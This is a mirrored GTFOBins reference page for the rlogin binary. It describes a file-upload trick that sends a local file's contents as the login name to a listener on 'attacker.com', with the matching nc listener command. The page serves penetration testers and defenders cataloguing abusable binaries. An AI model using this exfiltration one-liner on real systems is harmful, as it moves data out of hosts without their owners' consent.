GTFOBins.github.io/rlogin.md at e05b154647c59987188e61454ff75b98786005c0

mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00

Andrea Cardaci 9652aee337 Add comments to rlogin

Close #45.

2018-12-31 13:35:36 +01:00

description

functions

Usually `rlogin` is a symlink to `ssh`, the following works only when the *real* `rlogin` is used (e.g., from the `rsh-client` APT package).

file-upload

description	code
Send contents of a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker system to capture the contents. `rlogin` hangs waiting for the remote peer to close the socket. The file is corrupted by leading and trailing spurious data.	RHOST=attacker.com RPORT=12345 LFILE=file_to_send rlogin -l "$(cat $LFILE)" -p $RPORT $RHOST